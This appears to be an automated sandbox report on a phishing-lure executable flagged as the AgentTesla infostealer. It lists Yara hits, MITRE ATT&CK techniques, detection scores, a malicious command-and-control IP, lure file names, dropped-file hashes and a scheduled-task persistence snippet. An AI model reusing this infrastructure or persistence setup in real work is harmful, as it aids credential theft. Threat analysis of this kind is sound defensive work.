Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.40a0c30.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ADJUSTED PO3917NOV.exe.400c580.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ADJUSTED PO3917NOV.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.ADJUSTED PO3917NOV.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.327703338.00000000015C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327531363.00000000015CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327638100.00000000015C4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327579370.00000000015B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327676957.00000000015CA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.327479352.00000000015A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B4C40 sqlite3_bind_int64,	4_3_046B4C40
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B4C20 sqlite3_bind_int,	4_3_046B4C20
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B4CF0 sqlite3_bind_text,	4_3_046B4CF0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B4CC0 sqlite3_bind_null,	4_3_046B4CC0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B4D50 sqlite3_bind_value,	4_3_046B4D50
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B4D20 sqlite3_bind_text16,	4_3_046B4D20
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B4EE0 sqlite3_bind_zeroblob,	4_3_046B4EE0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B4F70 sqlite3_bind_parameter_count,	4_3_046B4F70
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B4FF0 sqlite3_bind_parameter_name,	4_3_046B4FF0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B3030 sqlite3_clear_bindings,_memset,	4_3_046B3030
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B50E0 sqlite3_bind_parameter_index,	4_3_046B50E0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B52D0 sqlite3_transfer_bindings,	4_3_046B52D0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B4BC0 sqlite3_bind_double,	4_3_046B4BC0
Source: C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe	Code function: 4_3_046B4B90 sqlite3_bind_blob,	4_3_046B4B90

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Create Account1	Access Token Manipulation1	Disable or Modify Tools1	OS Credential Dumping3	System Time Discovery12	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Endpoint Denial of Service1
Default Accounts	Scheduled Task/Job1	Windows Service1	Windows Service1	Deobfuscate/Decode Files or Information1	Input Capture21	System Service Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Service Execution2	Scheduled Task/Job1	Process Injection122	Obfuscated Files or Information2	Credentials In Files1	File and Directory Discovery3	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Scheduled Task/Job1	Software Packing11	NTDS	System Information Discovery27	Distributed Component Object Model	Input Capture21	Scheduled Transfer	Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading3	LSA Secrets	Security Software Discovery221	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion21	Cached Domain Credentials	Virtualization/Sandbox Evasion21	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection122	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Hidden Files and Directories1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Users1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ADJUSTED PO3917NOV.exe	31%	ReversingLabs	Win32.Trojan.AgentTesla

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\QUQovKcaZRcNZ.exe	29%	ReversingLabs	Win32.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Download
4.0.ADJUSTED PO3917NOV.exe.400000.8.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
4.0.ADJUSTED PO3917NOV.exe.400000.15.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
4.2.ADJUSTED PO3917NOV.exe.400000.0.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
4.0.ADJUSTED PO3917NOV.exe.400000.21.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
4.0.ADJUSTED PO3917NOV.exe.400000.4.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
4.0.ADJUSTED PO3917NOV.exe.400000.18.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
4.0.ADJUSTED PO3917NOV.exe.400000.12.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
4.0.ADJUSTED PO3917NOV.exe.400000.6.unpack	100%	Avira	TR/Redcap.ghjpt	Download File
4.0.ADJUSTED PO3917NOV.exe.400000.10.unpack	100%	Avira	TR/Redcap.ghjpt	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/dz	0%	Avira URL Cloud	safe
http://www.sajatypeworks.comB	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
185.222.57.253	4%	Virustotal		Browse
185.222.57.253	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.sajatypeworks.comeL	0%	Avira URL Cloud	safe
http://www.fontbureau.comitudl	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fontbureau.com;	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.founder.com.cn/cnpor	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.fontbureau.com.TTF	0%	URL Reputation	safe
http://www.fontbureau.comF	0%	URL Reputation	safe
http://www.sajatypeworks.comt	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Stan	0%	Avira URL Cloud	safe
http://www.fontbureau.comde	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/I	0%	URL Reputation	safe
http://www.fontbureau.comceva	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnr(	0%	Avira URL Cloud	safe
http://www.fontbureau.comdl	0%	Avira URL Cloud	safe
http://en.w	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/;	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/s	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.fontbureau.como	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/l	0%	URL Reputation	safe
http://www.fontbureau.comM.TTF	0%	URL Reputation	safe
http://www.sajatypeworks.com#	0%	Avira URL Cloud	safe
http://www.fontbureau.comivaI	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn#	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
185.222.57.253	true	4%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designersB	ADJUSTED PO3917NOV.exe, 00000000.00000003.300380444.0000000005D28000.00000004.00000001.sdmp	false		high
http://www.tiro.com	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/dz	ADJUSTED PO3917NOV.exe, 00000000.00000003.292846609.0000000005D2B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.comB	ADJUSTED PO3917NOV.exe, 00000000.00000003.291966655.0000000005D3B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp, ADJUSTED PO3917NOV.exe, 00000000.00000003.300380444.0000000005D28000.00000004.00000001.sdmp	false		high
http://www.goodfont.co.kr	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://github.com/syohex/java-simple-mine-sweeper	ADJUSTED PO3917NOV.exe	false		high
http://www.sajatypeworks.com	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.comeL	ADJUSTED PO3917NOV.exe, 00000000.00000003.291966655.0000000005D3B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comitudl	ADJUSTED PO3917NOV.exe, 00000000.00000003.295942171.0000000005D2D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com;	ADJUSTED PO3917NOV.exe, 00000000.00000003.296145703.0000000005D2C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.fonts.com	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false		high
http://www.sandoll.co.kr	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cnpor	ADJUSTED PO3917NOV.exe, 00000000.00000003.291737235.0000000005D28000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ADJUSTED PO3917NOV.exe, 00000000.00000002.327014581.0000000002ED1000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com.TTF	ADJUSTED PO3917NOV.exe, 00000000.00000003.296145703.0000000005D2C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	ADJUSTED PO3917NOV.exe, 00000000.00000003.292156707.0000000005D27000.00000004.00000001.sdmp, ADJUSTED PO3917NOV.exe, 00000000.00000003.292198894.0000000005D27000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com	ADJUSTED PO3917NOV.exe, 00000000.00000003.300689225.0000000005D27000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comF	ADJUSTED PO3917NOV.exe, 00000000.00000003.295910728.0000000005D2C000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.comt	ADJUSTED PO3917NOV.exe, 00000000.00000003.291966655.0000000005D3B000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/Stan	ADJUSTED PO3917NOV.exe, 00000000.00000003.292846609.0000000005D2B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comde	ADJUSTED PO3917NOV.exe, 00000000.00000003.295910728.0000000005D2C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/I	ADJUSTED PO3917NOV.exe, 00000000.00000003.292846609.0000000005D2B000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.comceva	ADJUSTED PO3917NOV.exe, 00000000.00000003.300689225.0000000005D27000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnr(	ADJUSTED PO3917NOV.exe, 00000000.00000003.291687095.0000000005D27000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comdl	ADJUSTED PO3917NOV.exe, 00000000.00000003.297131061.0000000005D2C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://en.w	ADJUSTED PO3917NOV.exe, 00000000.00000003.290529303.0000000005D26000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/;	ADJUSTED PO3917NOV.exe, 00000000.00000003.293647148.0000000005D2D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn	ADJUSTED PO3917NOV.exe, 00000000.00000003.291737235.0000000005D28000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/s	ADJUSTED PO3917NOV.exe, 00000000.00000003.293647148.0000000005D2D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.html	ADJUSTED PO3917NOV.exe, 00000000.00000003.295942171.0000000005D2D000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	ADJUSTED PO3917NOV.exe, 00000000.00000003.292846609.0000000005D2B000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.como	ADJUSTED PO3917NOV.exe, 00000000.00000003.300689225.0000000005D27000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/l	ADJUSTED PO3917NOV.exe, 00000000.00000003.293647148.0000000005D2D000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	ADJUSTED PO3917NOV.exe, 00000000.00000002.328394021.0000000006F32000.00000004.00000001.sdmp	false		high
http://www.fontbureau.comM.TTF	ADJUSTED PO3917NOV.exe, 00000000.00000003.296259109.0000000005D2E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com#	ADJUSTED PO3917NOV.exe, 00000000.00000003.291966655.0000000005D3B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/syohex/java-simple-mine-sweeperC:	ADJUSTED PO3917NOV.exe, 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp, ADJUSTED PO3917NOV.exe, 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp	false		high
http://www.fontbureau.comivaI	ADJUSTED PO3917NOV.exe, 00000000.00000003.295910728.0000000005D2C000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn#	ADJUSTED PO3917NOV.exe, 00000000.00000003.291797697.0000000005D27000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.222.57.253	unknown	Netherlands		51447	ROOTLAYERNETNL	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	514608
Start date:	03.11.2021
Start time:	13:23:15
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ADJUSTED PO3917NOV.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.expl.evad.winEXE@6/6@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 27.1% (good quality ratio 26.6%) Quality average: 84.6% Quality standard deviation: 21%
HCA Information:	Successful, ratio: 96% Number of executed functions: 101 Number of non-executed functions: 122
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:24:17	API Interceptor	2x Sleep call for process: ADJUSTED PO3917NOV.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.222.57.253	Kyodo International Corp - Products Lists.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ROOTLAYERNETNL	RJH5678909870432123406787654305670.exe	Get hash	malicious	Browse	185.222.57.217
	Q4EtLThkYlEkFvu.exe	Get hash	malicious	Browse	45.137.22.146
	CORMATEX - INQUIRY LIST.exe	Get hash	malicious	Browse	45.137.22.70
	Purchase Order# 210145.exe	Get hash	malicious	Browse	185.222.57.71
	PO_Contract_ANR07152112_20210715181907__110.exe	Get hash	malicious	Browse	185.222.57.71
	PO_Contract_ANR07152112_20210715181907__110.exe	Get hash	malicious	Browse	185.222.57.71
	PO.90764535.slip.scan.xls...exe	Get hash	malicious	Browse	185.222.57.242
	ENC MARKETING - INQUIRY AND SAMPLE REQUEST.exe	Get hash	malicious	Browse	45.137.22.70
	NAC0098765434567890-09876.exe	Get hash	malicious	Browse	185.222.57.90
	Order#7631298.slip..xls...exe	Get hash	malicious	Browse	185.222.57.242
	RHK098760045678009000.exe	Get hash	malicious	Browse	185.222.57.90
	FHKPO098765432345.exe	Get hash	malicious	Browse	185.222.57.90
	SecuriteInfo.com.Suspicious.Win32.Save.a.4240.exe	Get hash	malicious	Browse	185.222.58.151
	SecuriteInfo.com.Artemis3008D0721A6C.1070.exe	Get hash	malicious	Browse	185.222.58.151
	AWB #3099657260.xlsx	Get hash	malicious	Browse	185.222.57.190
	HIC INTERNATIONAL - REQUEST FOR QUOTATION DOCUMENTS.exe	Get hash	malicious	Browse	45.137.22.70
	AWB #30996572600.xlsx	Get hash	malicious	Browse	185.222.57.190
	BL. NO. ANSMUNDAR3621.exe	Get hash	malicious	Browse	185.222.57.71
	Payment Supplier.xlsx	Get hash	malicious	Browse	185.222.57.85
	BULK ORDER #RFQ REF R2100131410.exe	Get hash	malicious	Browse	45.137.22.70

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ADJUSTED PO3917NOV.exe.log Download File
Process:	C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\tmpD7D5.tmp Download File
Process:	C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1646
Entropy (8bit):	5.2021349858666435
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBgAPtn:cbh47TlNQ//rydbz9I3YODOLNdq3yy
MD5:	1C1A65CA91C09759C032BDB8A9D63E5D
SHA1:	99404B26FCF77D27761690D71EEDB2C2B41B8755
SHA-256:	14C38D65AA4C38350AD298E9742BC7982B635FF0D82C1B973710D84BAFB53C2E
SHA-512:	9ACF01FDBC35568D22E53C21723C1B4EFB488EEC84E17B8444823A628F5D09EDEA04EEFF76A3A524C0C8C050D2CE819FABB6DA845767B531F260614C72B165B8
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Roaming\AHuvEkw.tmp Download File
Process:	C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
